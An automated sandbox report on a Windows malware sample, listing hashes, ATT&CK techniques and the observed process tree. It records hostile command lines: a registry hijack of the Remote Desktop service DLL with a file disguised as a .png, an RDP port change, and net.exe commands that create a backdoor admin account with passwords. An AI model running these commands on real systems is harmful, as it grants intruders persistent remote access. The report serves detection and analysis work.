7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964

General

Target

7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe
Size

3.1MB
MD5

5759db9acfaeaee9c5186d5b8ff6b289
SHA1

fc8f63658cb6e2b27ab97ebc15b6ec791eda4834
SHA256

7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964
SHA512

599e7b2665bc25250f8ddebd2f73d07fe7b63f313bcdbd2893df912cf458fa6b2084754170c22601696c5ea9c49827bd2dc8f0a8e3b1533333b3cadbd5cd954e

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2784
2784

pid	process
2784
2784

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2512 reg.exe
Runs net.exe

pid	process
2512	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
3140	powershell.exe
3140	powershell.exe
3140	powershell.exe
4408	powershell.exe
4408	powershell.exe
4408	powershell.exe
512	powershell.exe
512	powershell.exe
512	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

620
620

pid	process
620
620

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeIncreaseQuotaPrivilege	3140	powershell.exe
Token: SeSecurityPrivilege	3140	powershell.exe
Token: SeTakeOwnershipPrivilege	3140	powershell.exe
Token: SeLoadDriverPrivilege	3140	powershell.exe
Token: SeSystemProfilePrivilege	3140	powershell.exe
Token: SeSystemtimePrivilege	3140	powershell.exe
Token: SeProfSingleProcessPrivilege	3140	powershell.exe
Token: SeIncBasePriorityPrivilege	3140	powershell.exe
Token: SeCreatePagefilePrivilege	3140	powershell.exe
Token: SeBackupPrivilege	3140	powershell.exe
Token: SeRestorePrivilege	3140	powershell.exe
Token: SeShutdownPrivilege	3140	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe
Token: SeSystemEnvironmentPrivilege	3140	powershell.exe
Token: SeRemoteShutdownPrivilege	3140	powershell.exe
Token: SeUndockPrivilege	3140	powershell.exe
Token: SeManageVolumePrivilege	3140	powershell.exe
Token: 33	3140	powershell.exe
Token: 34	3140	powershell.exe
Token: 35	3140	powershell.exe
Token: 36	3140	powershell.exe
Token: SeIncreaseQuotaPrivilege	512	powershell.exe
Token: SeSecurityPrivilege	512	powershell.exe
Token: SeTakeOwnershipPrivilege	512	powershell.exe
Token: SeLoadDriverPrivilege	512	powershell.exe
Token: SeSystemProfilePrivilege	512	powershell.exe
Token: SeSystemtimePrivilege	512	powershell.exe
Token: SeProfSingleProcessPrivilege	512	powershell.exe
Token: SeIncBasePriorityPrivilege	512	powershell.exe
Token: SeCreatePagefilePrivilege	512	powershell.exe
Token: SeBackupPrivilege	512	powershell.exe
Token: SeRestorePrivilege	512	powershell.exe
Token: SeShutdownPrivilege	512	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeSystemEnvironmentPrivilege	512	powershell.exe
Token: SeRemoteShutdownPrivilege	512	powershell.exe
Token: SeUndockPrivilege	512	powershell.exe
Token: SeManageVolumePrivilege	512	powershell.exe
Token: 33	512	powershell.exe
Token: 34	512	powershell.exe
Token: 35	512	powershell.exe
Token: 36	512	powershell.exe
Token: SeIncreaseQuotaPrivilege	4408	powershell.exe
Token: SeSecurityPrivilege	4408	powershell.exe
Token: SeTakeOwnershipPrivilege	4408	powershell.exe
Token: SeLoadDriverPrivilege	4408	powershell.exe
Token: SeSystemProfilePrivilege	4408	powershell.exe
Token: SeSystemtimePrivilege	4408	powershell.exe
Token: SeProfSingleProcessPrivilege	4408	powershell.exe
Token: SeIncBasePriorityPrivilege	4408	powershell.exe
Token: SeCreatePagefilePrivilege	4408	powershell.exe
Token: SeBackupPrivilege	4408	powershell.exe
Token: SeRestorePrivilege	4408	powershell.exe
Token: SeShutdownPrivilege	4408	powershell.exe
Token: SeDebugPrivilege	4408	powershell.exe
Token: SeSystemEnvironmentPrivilege	4408	powershell.exe
Token: SeRemoteShutdownPrivilege	4408	powershell.exe
Token: SeUndockPrivilege	4408	powershell.exe
Token: SeManageVolumePrivilege	4408	powershell.exe
Token: 33	4408	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4708 wrote to memory of 4228	4708	7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe	powershell.exe
PID 4708 wrote to memory of 4228	4708	7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe	powershell.exe
PID 4228 wrote to memory of 2144	4228	powershell.exe	csc.exe
PID 4228 wrote to memory of 2144	4228	powershell.exe	csc.exe
PID 2144 wrote to memory of 1864	2144	csc.exe	cvtres.exe
PID 2144 wrote to memory of 1864	2144	csc.exe	cvtres.exe
PID 4228 wrote to memory of 3140	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 3140	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 4408	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 4408	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 512	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 512	4228	powershell.exe	powershell.exe
PID 4228 wrote to memory of 2480	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 2480	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 2512	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 2512	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 2520	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 2520	4228	powershell.exe	reg.exe
PID 4228 wrote to memory of 4684	4228	powershell.exe	net.exe
PID 4228 wrote to memory of 4684	4228	powershell.exe	net.exe
PID 4684 wrote to memory of 2596	4684	net.exe	net1.exe
PID 4684 wrote to memory of 2596	4684	net.exe	net1.exe
PID 4228 wrote to memory of 4260	4228	powershell.exe	cmd.exe
PID 4228 wrote to memory of 4260	4228	powershell.exe	cmd.exe
PID 4260 wrote to memory of 212	4260	cmd.exe	cmd.exe
PID 4260 wrote to memory of 212	4260	cmd.exe	cmd.exe
PID 212 wrote to memory of 192	212	cmd.exe	net.exe
PID 212 wrote to memory of 192	212	cmd.exe	net.exe
PID 192 wrote to memory of 4396	192	net.exe	net1.exe
PID 192 wrote to memory of 4396	192	net.exe	net1.exe
PID 4228 wrote to memory of 1020	4228	powershell.exe	cmd.exe
PID 4228 wrote to memory of 1020	4228	powershell.exe	cmd.exe
PID 1020 wrote to memory of 2908	1020	cmd.exe	cmd.exe
PID 1020 wrote to memory of 2908	1020	cmd.exe	cmd.exe
PID 2908 wrote to memory of 2936	2908	cmd.exe	net.exe
PID 2908 wrote to memory of 2936	2908	cmd.exe	net.exe
PID 2936 wrote to memory of 3868	2936	net.exe	net1.exe
PID 2936 wrote to memory of 3868	2936	net.exe	net1.exe
PID 1440 wrote to memory of 4644	1440	cmd.exe	net.exe
PID 1440 wrote to memory of 4644	1440	cmd.exe	net.exe
PID 4644 wrote to memory of 2112	4644	net.exe	net1.exe
PID 4644 wrote to memory of 2112	4644	net.exe	net1.exe
PID 4580 wrote to memory of 5048	4580	cmd.exe	net.exe
PID 4580 wrote to memory of 5048	4580	cmd.exe	net.exe
PID 5048 wrote to memory of 3980	5048	net.exe	net1.exe
PID 5048 wrote to memory of 3980	5048	net.exe	net1.exe
PID 3032 wrote to memory of 3732	3032	cmd.exe	net.exe
PID 3032 wrote to memory of 3732	3032	cmd.exe	net.exe
PID 3732 wrote to memory of 4712	3732	net.exe	net1.exe
PID 3732 wrote to memory of 4712	3732	net.exe	net1.exe
PID 3944 wrote to memory of 4176	3944	cmd.exe	net.exe
PID 3944 wrote to memory of 4176	3944	cmd.exe	net.exe
PID 4176 wrote to memory of 748	4176	net.exe	net1.exe
PID 4176 wrote to memory of 748	4176	net.exe	net1.exe
PID 3084 wrote to memory of 2176	3084	cmd.exe	net.exe
PID 3084 wrote to memory of 2176	3084	cmd.exe	net.exe
PID 2176 wrote to memory of 4144	2176	net.exe	net1.exe
PID 2176 wrote to memory of 4144	2176	net.exe	net1.exe
PID 4384 wrote to memory of 4360	4384	cmd.exe	net.exe
PID 4384 wrote to memory of 4360	4384	cmd.exe	net.exe
PID 4360 wrote to memory of 3536	4360	net.exe	net1.exe
PID 4360 wrote to memory of 3536	4360	net.exe	net1.exe
PID 4228 wrote to memory of 4780	4228	powershell.exe	cmd.exe
PID 4228 wrote to memory of 4780	4228	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe
"C:\Users\Admin\AppData\Local\Temp\7e430306f8f710bc9d1a6b094ecb7fb5a507b6dc9223e39dac1de02337d12964.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4708

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4228

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ltyx31g2\ltyx31g2.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4646.tmp" "c:\Users\Admin\AppData\Local\Temp\ltyx31g2\CSC5E88B84944540569BB0B9C6596842A.TMP"
4⤵
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:512

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2480

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2512

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2520

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:4684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2596

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:4396

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3868

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:4780

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:4736

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1440

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:4644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:2112

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc cikTTsPK /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4580

C:\Windows\system32\net.exe
net.exe user wgautilacc cikTTsPK /add
2⤵
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc cikTTsPK /add
3⤵
PID:3980

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:3732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:4712

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3944

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:4176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EWYCRADZ$ /ADD
3⤵
PID:748

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3084

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:4144

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc cikTTsPK
1⤵
- Suspicious use of WriteProcessMemory
PID:4384

C:\Windows\system32\net.exe
net.exe user wgautilacc cikTTsPK
2⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc cikTTsPK
3⤵
PID:3536

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:4560

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:4432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:4484

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES4646.tmp
MD5
bc14425d3f5f7d6e08730161fcd676ca

SHA1
2946edac6186f858151d0cda4a22ab9122200507

SHA256
8b88264ea265c9e2810d1bceec07ddcf2ecd1df2c616f0f8f2af99090fad4d96

SHA512
b83f8149336816ba0dd94e891eee6a8e68d7d464f44b7c34e84b8d948fb96d4e7be24a3d63c62e9f1cdc8455f6faf79a62fd4061dd4fde8e2211e4d71632e275

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
C:\Users\Admin\AppData\Local\Temp\ltyx31g2\ltyx31g2.dll
MD5
cdb5df88f79839c5cdd83600744de993

SHA1
ac0e5c6b627e34a12275da2eb903d01287baa21e

SHA256
3b9e4df22b6d15b2f18665938a31a21754407c79c378edfd30c8fcf6d344c362

SHA512
18d5f58baad21ee24360d98df96d4365ebd984824d6c75fd2ea9a9843c1624412a090c40a0817cf34288225fd617dd49315be74604345730c9b4046db984ad2a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ltyx31g2\CSC5E88B84944540569BB0B9C6596842A.TMP
MD5
e2c1a1072bdd168ed4d48e18bcc3ddf9

SHA1
ff941360cedd95886de1c6d0bb7b9eee5ccda1d4

SHA256
81c8b199cf38124e90a9ff0c62f7935a6f22d7875ddaa99324031eb4e2c7e1d2

SHA512
a1802dd00b4e15e80f22e52765a49db120b66f4e54bed6a16911f84a4394f0a0f5048345c686fa2c6993406897bfaa95d7693024773804d64021f3f5e435b8fa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ltyx31g2\ltyx31g2.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ltyx31g2\ltyx31g2.cmdline
MD5
d0ebd2a8f18a007125a8f6740d08946a

SHA1
422da76f96eae360f12e03a074ebb11a654f0a81

SHA256
79951d39c7a29390fd46496c60cdb50a6d8df90fd6dcba041c26f6a11aa322b9

SHA512
1f039a5c7c26380ba28e630e9c2d06288f42597bc664099ce986ae868a6f67c828b91b0c020d42412f2ed19284a93f09d556e75c71342d1ebd8a1fd2d42f16d2

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/192-37-0x0000000000000000-mapping.dmp

Download
memory/212-36-0x0000000000000000-mapping.dmp

Download
memory/512-25-0x0000000000000000-mapping.dmp

Download
memory/512-27-0x00007FF862D70000-0x00007FF86375C000-memory.dmp

Filesize
9.9MB

Download
memory/748-52-0x0000000000000000-mapping.dmp

Download
memory/1020-39-0x0000000000000000-mapping.dmp

Download
memory/1864-11-0x0000000000000000-mapping.dmp

Download
memory/2112-46-0x0000000000000000-mapping.dmp

Download
memory/2144-8-0x0000000000000000-mapping.dmp

Download
memory/2176-53-0x0000000000000000-mapping.dmp

Download
memory/2480-30-0x0000000000000000-mapping.dmp

Download
memory/2512-31-0x0000000000000000-mapping.dmp

Download
memory/2520-32-0x0000000000000000-mapping.dmp

Download
memory/2596-34-0x0000000000000000-mapping.dmp

Download
memory/2908-40-0x0000000000000000-mapping.dmp

Download
memory/2936-41-0x0000000000000000-mapping.dmp

Download
memory/3140-19-0x00007FF862D70000-0x00007FF86375C000-memory.dmp

Filesize
9.9MB

Download
memory/3140-18-0x0000000000000000-mapping.dmp

Download
memory/3536-56-0x0000000000000000-mapping.dmp

Download
memory/3732-49-0x0000000000000000-mapping.dmp

Download
memory/3868-42-0x0000000000000000-mapping.dmp

Download
memory/3980-48-0x0000000000000000-mapping.dmp

Download
memory/4144-54-0x0000000000000000-mapping.dmp

Download
memory/4176-51-0x0000000000000000-mapping.dmp

Download
memory/4228-2-0x0000000000000000-mapping.dmp

Download
memory/4228-4-0x0000023924B40000-0x0000023924B41000-memory.dmp

Filesize
4KB

Download
memory/4228-3-0x00007FF862D70000-0x00007FF86375C000-memory.dmp

Filesize
9.9MB

Download
memory/4228-16-0x00000239475F0000-0x00000239475F1000-memory.dmp

Filesize
4KB

Download
memory/4228-6-0x000002393F3F0000-0x000002393F3F1000-memory.dmp

Filesize
4KB

Download
memory/4228-5-0x000002393CC00000-0x000002393CC01000-memory.dmp

Filesize
4KB

Download
memory/4228-15-0x0000023924BA0000-0x0000023924BA1000-memory.dmp

Filesize
4KB

Download
memory/4228-17-0x0000023947980000-0x0000023947981000-memory.dmp

Filesize
4KB

Download
memory/4260-35-0x0000000000000000-mapping.dmp

Download
memory/4360-55-0x0000000000000000-mapping.dmp

Download
memory/4396-38-0x0000000000000000-mapping.dmp

Download
memory/4408-21-0x0000000000000000-mapping.dmp

Download
memory/4408-23-0x00007FF862D70000-0x00007FF86375C000-memory.dmp

Filesize
9.9MB

Download
memory/4432-59-0x0000000000000000-mapping.dmp

Download
memory/4484-60-0x0000000000000000-mapping.dmp

Download
memory/4644-45-0x0000000000000000-mapping.dmp

Download
memory/4684-33-0x0000000000000000-mapping.dmp

Download
memory/4708-1-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
memory/4712-50-0x0000000000000000-mapping.dmp

Download
memory/4736-58-0x0000000000000000-mapping.dmp

Download
memory/4780-57-0x0000000000000000-mapping.dmp

Download
memory/5048-47-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads